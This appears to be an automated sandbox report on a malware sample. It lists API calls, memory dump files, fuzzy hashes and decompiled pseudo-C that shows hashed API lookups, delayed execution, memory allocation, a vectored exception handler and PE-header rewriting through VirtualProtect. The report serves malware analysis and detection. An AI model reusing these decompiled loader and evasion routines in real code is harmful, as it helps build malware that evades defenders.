0x6e8908ad
0x6e89082b
0x6e89082b
0x6e89082c
0x6e89082d
0x6e89082d
0x6e890ceb
0x6e890ceb
0x6e890cf5
0x6e890cf5
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,D0443458,D0443458), ref: 6E8908FA
GetSystemInfo.KERNELBASE(?,4BCC7CBA,4BCC7CBA,?,?,F3453DD0,?,?,DB1D9B48,?,?,05411B30,00000000,80000002,00000000,-000000FC), ref: 6E890CBC
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,D0443458,D0443458,00000000,D0443458,D0443458), ref: 6E890D50

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: 403c5d002b1c9e126e58719266ae28f56d23893fbd5fb7a8069e9ff710f6d847
Instruction ID: 22ab6c2717a28064b3c18dc339a53f43b81071fa0ceefad1b0ec00bccb9b19a0
Opcode Fuzzy Hash: 403c5d002b1c9e126e58719266ae28f56d23893fbd5fb7a8069e9ff710f6d847
Instruction Fuzzy Hash: BF22E570A08345AFE761CBACC850BEF77E9AF92318F108D19E8959B1D1EB30D845E752

Uniqueness

Uniqueness Score: -1.00%

Function 6E881494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E6E881494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6E88F620( &_v72, 0);
				_v60 = 0x22dc1034;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6E88F8C4( &_v76, E6E88F568( &_v76) + 0x10);
				E6E88F558( &_v80, E6E88F568( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x853cdd04;
				asm("movq [ecx+0x18], xmm0");
				E6E88F8C4( &_v84, E6E88F568(_t325) + 0x10);
				E6E88F558( &_v88, E6E88F568( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0xb162dc4e;
				asm("movq [ecx+0x18], xmm0");
				E6E88F8C4( &_v92, E6E88F568(_t329) + 0x10);
				E6E88F558( &_v96, E6E88F568( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0xc15ccc53;
				asm("movq [ecx+0x18], xmm0");
				E6E88F8C4( &_v100, E6E88F568(_t333) + 0x10);
				E6E88F558( &_v104, E6E88F568( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xc8fc2de6;
				asm("movq [ecx+0x18], xmm0");
				E6E88F8C4( &_v108, E6E88F568(_t337) + 0x10);
				E6E88F558( &_v112, E6E88F568( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0x7d07f92f;
				asm("movq [ecx+0x18], xmm0");
				E6E88F8C4( &_v116, E6E88F568(_t341) + 0x10);
				E6E88F558( &_v120, E6E88F568( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0xfc7fa539;
				asm("movq [ecx+0x18], xmm0");
				E6E88F8C4( &_v124, E6E88F568(_t345) + 0x10);
				E6E88F558( &_v128, E6E88F568( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x4145240a;
				asm("movq [ecx+0x18], xmm0");
				E6E88F8C4( &_v132, E6E88F568(_t349) + 0x10);
				E6E88F558( &_v136, E6E88F568( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0x2c2324e8;
				asm("movq [ecx+0x18], xmm0");
				E6E88F8C4( &_v140, E6E88F568(_t353) + 0x10);
				E6E88F558( &_v144, E6E88F568( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0xf06b4c6b;
				asm("movq [ecx+0x18], xmm0");
				E6E88F8C4( &_v148, E6E88F568(_t357) + 0x10);
				E6E88F558( &_v152, E6E88F568( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0xa54975b2;
				asm("movq [ecx+0x18], xmm0");
				E6E88F8C4( &_v156, E6E88F568(_t361) + 0x10);
				E6E88F558( &_v160, E6E88F568( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x563e1998;
				asm("movq [ecx+0x18], xmm0");
				E6E88F8C4( &_v164, E6E88F568(_t365) + 0x10);
				E6E88F558( &_v168, E6E88F568( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0xd926c223;
				asm("movq [ecx+0x18], xmm0");
				E6E88F8C4( &_v172, E6E88F568(_t369) + 0x10);
				E6E88F558( &_v176, E6E88F568( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x80febacc;
				asm("movq [ecx+0x18], xmm0");
				E6E88F8C4( &_v180, E6E88F568(_t373) + 0x10);
				E6E88F558( &_v184, E6E88F568( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x98595b64;
				asm("movq [ecx+0x18], xmm0");
				E6E88F8C4( &_v188, E6E88F568(_t377) + 0x10);
				E6E88F558( &_v192, E6E88F568( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x8e3b5f9c;
				asm("movq [ecx+0x18], xmm0");
				E6E88F8C4( &_v196, E6E88F568(_t381) + 0x10);
				E6E88F558( &_v200, E6E88F568( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x9b42cb07;
				asm("movq [ecx+0x18], xmm0");
				E6E88F8C4( &_v204, E6E88F568(_t385) + 0x10);
				E6E88F558( &_v208, E6E88F568( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6E89413C(0xa5eabdf8, _t434);
				E6E88F558( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6E88F558( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6E88F558( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6E88F558( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6E88F558( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6E88F558( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6E88F558( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6E88F558( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6E88F558( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6E88F558( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6E88F558( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6E88F558( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6E88F558( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6E88F558( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6E88F558( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6E88F558( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6E88F558( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6E881D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6E88B338( &_v248, _v256, _t481, _v252, _t318);
				E6E88F8DC( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0xfb42c037;
				asm("movq [ecx+0x18], xmm0");
				E6E88F8C4( &_v296, E6E88F568(_t410) + 0x10);
				E6E88F558( &_v300, E6E88F568( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0x7082aaf3;
				asm("movq [ecx+0x18], xmm0");
				E6E88F8C4( &_v304, E6E88F568(_t414) + 0x10);
				E6E88F558( &_v308, E6E88F568( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0x1eeb5e35;
				asm("movq [ecx+0x18], xmm0");
				E6E88F8C4( &_v312, E6E88F568(_t418) + 0x10);
				E6E88F558( &_v316, E6E88F568( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0xe856fc47;
				asm("movq [ecx+0x18], xmm0");
				E6E88F8C4( &_v320, E6E88F568(_t422) + 0x10);
				E6E88F558( &_v324, E6E88F568( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6E88BAB8(_t154,  *_t480);
				E6E88F558( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0"); // executed
				E6E88F558( &_v344, 0x10); // executed
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6E88F558( &_v348, "true");
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6E88F558( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6E88F6F0( &_v316);
				return E6E88F6F0( &_v356);
			}

0x6e881494
0x6e881498
0x6e88149d
0x6e8814a3
0x6e8814ab
0x6e8814b0
0x6e8814bc
0x6e8814c0
0x6e8814d2
0x6e8814e8
0x6e8814f3
0x6e8814f4
0x6e8814f5
0x6e8814f6
0x6e8814f7
0x6e8814fa
0x6e8814fe
0x6e881502
0x6e881509
0x6e88151b
0x6e881531
0x6e88153c
0x6e88153d
0x6e88153e
0x6e88153f
0x6e881540
0x6e881543
0x6e881547
0x6e88154b
0x6e881552
0x6e881564
0x6e88157a
0x6e881585
0x6e881586
0x6e881587
0x6e881588
0x6e881589
0x6e88158c
0x6e881590
0x6e881594
0x6e88159b
0x6e8815ad
0x6e8815c3
0x6e8815ce
0x6e8815cf
0x6e8815d0
0x6e8815d1
0x6e8815d2
0x6e8815d5
0x6e8815d9
0x6e8815dd
0x6e8815e4
0x6e8815f6
0x6e88160c
0x6e881617
0x6e881618
0x6e881619
0x6e88161a
0x6e88161b
0x6e88161e
0x6e881622
0x6e881626
0x6e88162d
0x6e88163f
0x6e881655
0x6e881660
0x6e881661
0x6e881662
0x6e881663
0x6e881664
0x6e881667
0x6e88166b
0x6e88166f
0x6e881676
0x6e881688
0x6e88169e
0x6e8816a9
0x6e8816aa
0x6e8816ab
0x6e8816ac
0x6e8816ad
0x6e8816b0
0x6e8816b4
0x6e8816b8
0x6e8816bf
0x6e8816d1
0x6e8816e7
0x6e8816f2
0x6e8816f3
0x6e8816f4
0x6e8816f5
0x6e8816f6
0x6e8816f9
0x6e8816fd
0x6e881701
0x6e881708
0x6e88171a
0x6e881730
0x6e88173b
0x6e88173c
0x6e88173d
0x6e88173e
0x6e88173f
0x6e881742
0x6e881746
0x6e88174a
0x6e881751
0x6e881763
0x6e881779
0x6e881784
0x6e881785
0x6e881786
0x6e881787
0x6e881788
0x6e88178b
0x6e88178f
0x6e881793
0x6e88179a
0x6e8817ac
0x6e8817c2
0x6e8817cd
0x6e8817ce
0x6e8817cf
0x6e8817d0
0x6e8817d1
0x6e8817d4
0x6e8817d8
0x6e8817dc
0x6e8817e3
0x6e8817f5
0x6e88180b
0x6e881816
0x6e881817
0x6e881818
0x6e881819
0x6e88181a
0x6e88181d
0x6e881821
0x6e881825
0x6e88182c
0x6e88183e
0x6e881854
0x6e88185f
0x6e881860
0x6e881861
0x6e881862
0x6e881863
0x6e881866
0x6e88186a
0x6e88186e
0x6e881875
0x6e881887
0x6e88189d
0x6e8818a8
0x6e8818a9
0x6e8818aa
0x6e8818ab
0x6e8818ac
0x6e8818af
0x6e8818b3
0x6e8818b7
0x6e8818be
0x6e8818d0
0x6e8818e6
0x6e8818f1
0x6e8818f2
0x6e8818f3
0x6e8818f4
0x6e8818f5
0x6e8818f8
0x6e8818fc
0x6e881900
0x6e881907
0x6e881919
0x6e88192f
0x6e88193a
0x6e88193b
0x6e88193c
0x6e88193d
0x6e88193e
0x6e881941
0x6e881945
0x6e881949
0x6e881950
0x6e881962
0x6e881978
0x6e881983
0x6e881984
0x6e881985
0x6e881986
0x6e88198c
0x6e88198f
0x6e881991
0x6e88199c
0x6e8819a3
0x6e8819ac
0x6e8819b4
0x6e8819bb
0x6e8819c4
0x6e8819cc
0x6e8819d3
0x6e8819dc
0x6e8819e4
0x6e8819eb
0x6e8819f4
0x6e8819fc
0x6e881a03
0x6e881a0c
0x6e881a14
0x6e881a1b
0x6e881a24
0x6e881a2c
0x6e881a36
0x6e881a3f
0x6e881a47
0x6e881a51
0x6e881a5a
0x6e881a62
0x6e881a6c
0x6e881a75
0x6e881a7d
0x6e881a87
0x6e881a90
0x6e881a98
0x6e881aa2
0x6e881aab
0x6e881ab3
0x6e881abd
0x6e881ac6
0x6e881ace
0x6e881ad8
0x6e881ae1
0x6e881ae9
0x6e881af3
0x6e881afc
0x6e881b04
0x6e881b0e
0x6e881b17
0x6e881b1f
0x6e881b26
0x6e881b2f
0x6e881b37
0x6e881b3e
0x6e881b43
0x6e881b51
0x6e881b55
0x6e881b64
0x6e881b6d
0x6e881b72
0x6e881b79
0x6e881b7d
0x6e881b81
0x6e881b88
0x6e881b9a
0x6e881bb0
0x6e881bbb
0x6e881bbc
0x6e881bbd
0x6e881bbe
0x6e881bbf
0x6e881bc2
0x6e881bc6
0x6e881bca
0x6e881bd1
0x6e881be3
0x6e881bf9
0x6e881c04
0x6e881c05
0x6e881c06
0x6e881c07
0x6e881c08
0x6e881c0b
0x6e881c0f
0x6e881c13
0x6e881c1a
0x6e881c2c
0x6e881c42
0x6e881c4d
0x6e881c4e
0x6e881c4f
0x6e881c50
0x6e881c51
0x6e881c54
0x6e881c58
0x6e881c5c
0x6e881c63
0x6e881c75
0x6e881c8b
0x6e881c96
0x6e881c97
0x6e881c98
0x6e881c99
0x6e881c9a
0x6e881c9d
0x6e881ca0
0x6e881ca1
0x6e881ca2
0x6e881ca9
0x6e881cac
0x6e881cb7
0x6e881cbe
0x6e881cc7
0x6e881ccf
0x6e881cd6
0x6e881cdf
0x6e881ce7
0x6e881cee
0x6e881cf7
0x6e881cff
0x6e881d04
0x6e881d0d
0x6e881d15
0x6e881d2a

Strings

$#,, xrefs: 6E881701

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $#,
API String ID: 0-2557146312
Opcode ID: faf8bf4f383b9672c02f2385df81a17d360748bba604cd6ce172ee8b62593912
Instruction ID: 095874f91a0a8ffc9b55b00b00f1259f07e28dbc623b6eef17fa81dffa18bd0b
Opcode Fuzzy Hash: faf8bf4f383b9672c02f2385df81a17d360748bba604cd6ce172ee8b62593912
Instruction Fuzzy Hash: 8A324372404A099BC705DFA4C8519DFB7A4BFB1309F304F1EB8992A1A1FF71EA86C651

Uniqueness

Uniqueness Score: -1.00%

Function 6E89218C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6E89218C(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6E893A34(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E6E892F94(0xa5eabdf8, 0xd48281c0, 0xa5eabdf8, 0xa5eabdf8);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x6e89218c
0x6e892190
0x6e8921ac
0x6e8921af
0x6e892192
0x6e8921a1
0x6e8921a4
0x6e8921a4
0x6e8921bf
0x6e8921c4
0x6e8921c8
0x6e8921d0
0x6e8921d0
0x6e8921d4

APIs

NtDelayExecution.NTDLL(00000000,00000000,A5EABDF8,A5EABDF8,FFFFFFFF,FFFFFFFF,6E8835C3,00000000,00000000,?), ref: 6E8921D0

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: e340f986def6f26baa2f9c03e956c8e364c5e46def001a9482b730e7c6c19888
Instruction ID: 16b347d21b68b4e53fb2c2b8a9a463d6d8f5c61b8a4384d7ce8fdfa28a6466e9
Opcode Fuzzy Hash: e340f986def6f26baa2f9c03e956c8e364c5e46def001a9482b730e7c6c19888
Instruction Fuzzy Hash: B7E09BB094E3016EFB44976D5C00B2B7ADC9F81211F208E1DB554D72C4E634D4105722

Uniqueness

Uniqueness Score: -1.00%

Function 6E892790, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E892790(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6E892F94(0xa5eabdf8, 0xc15ccc53, 0xa5eabdf8, 0xa5eabdf8) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x6e892797
0x6e8927a0
0x6e8927ae
0x6e8927d1
0x6e8927d1
0x6e8927b0
0x6e8927c7
0x6e8927cb
0x00000000
0x6e8927cd
0x6e8927cd
0x6e8927cd
0x6e8927cb
0x6e8927d6

APIs

NtAllocateVirtualMemory.NTDLL(A5EABDF8,?,00000000,22DC1034,00000004,00000004,A5EABDF8,A5EABDF8,?,?,6E898852,00003000,00000004,000000FF,A5EABDF8,22DC1034), ref: 6E8927C7

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: fcb83ea506db4d533a488a570b7e2b2bbaaaa8a6521a140e351edaccfb331de1
Instruction ID: 952d31a3748d216f7cc9a8e3450c01a686a32a872308cf1c02eb131714a6e002
Opcode Fuzzy Hash: fcb83ea506db4d533a488a570b7e2b2bbaaaa8a6521a140e351edaccfb331de1
Instruction Fuzzy Hash: F0E0307160D342BFEB09CA69DC14E6BB7EDEF89200F108D1DB4A4D7550DB74D844A722

Uniqueness

Uniqueness Score: -1.00%

Function 6E893060, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6E893060(intOrPtr* __ecx) {
				void* _t1;

				_push(E6E8933D8);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6e893060
0x6e893065
0x6e893067
0x6e893069

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6E8933D8,6E893050,A5EABDF8,A5EABDF8,?,6E882530,00000001), ref: 6E893067

Memory Dump Source

Source File: 00000002.00000002.494850916.000000006E881000.00000020.00020000.sdmp, Offset: 6E880000, based on PE: true

Associated: 00000002.00000002.494843808.000000006E880000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494920728.000000006E89A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.494930657.000000006E89D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.494950242.000000006E89F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: ce1b4b151c99026ea8d994f307c5817c97332e05f2a63cf6c21ca3f990706a1b
Instruction ID: 705ab4f2e5b7673c23aceebbc77566a8a5991c053f6a6a4cf6e7adab3b54c4f9
Opcode Fuzzy Hash: ce1b4b151c99026ea8d994f307c5817c97332e05f2a63cf6c21ca3f990706a1b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00D52213, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00D52213(long __ebx, long __edi, void* __esi, intOrPtr* _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				void* _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char* _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				int _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr* _t136;
				int _t143;
				int _t151;
				int _t155;
				intOrPtr _t170;
				int _t177;
				void* _t226;
				intOrPtr _t229;
				intOrPtr _t234;
				void* _t236;
				intOrPtr* _t240;
				intOrPtr _t247;
				intOrPtr _t251;
				DWORD* _t264;
				void* _t268;
				intOrPtr* _t271;
				intOrPtr* _t272;

				_t136 = _a4;
				_v20 = 0;
				_t236 =  *((intOrPtr*)(_t136 + 0x40));
				 *0xd54418 = 1;
				asm("movaps xmm0, [0xd53010]");
				asm("movups [0xd54428], xmm0");
				_v48 = _t136;
				_v52 =  *((intOrPtr*)(_t136 + 0x64));
				_v56 =  *((intOrPtr*)(_v48 + 8));
				_v184 = _t236;
				_v60 =  *((intOrPtr*)(_v48 + 0x50));
				_v180 = _v52;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t136 + 0x60));
				_v68 = 4;
				_v72 = _t236;
				_v76 =  &_v20;
				_t143 = VirtualProtect(__esi, __edi, __ebx, _t264); // executed
				_v80 = _t143;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x64));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E00D52569();
				E00D51D28(_v72,  *((intOrPtr*)(_v48 + 0xc)), _v56);
				E00D52569( *((intOrPtr*)(_v48 + 0xc)), 0, _v56);
				_t151 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t271 = _t268 - 0x88;
				_t226 = _v72;
				_t251 =  *((intOrPtr*)(_t226 + 0x3c));
				_v100 = _t151;
				_v104 = _v72 + 0x3c;
				_v108 = _t226;
				_v112 = _t251;
				if(_t251 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
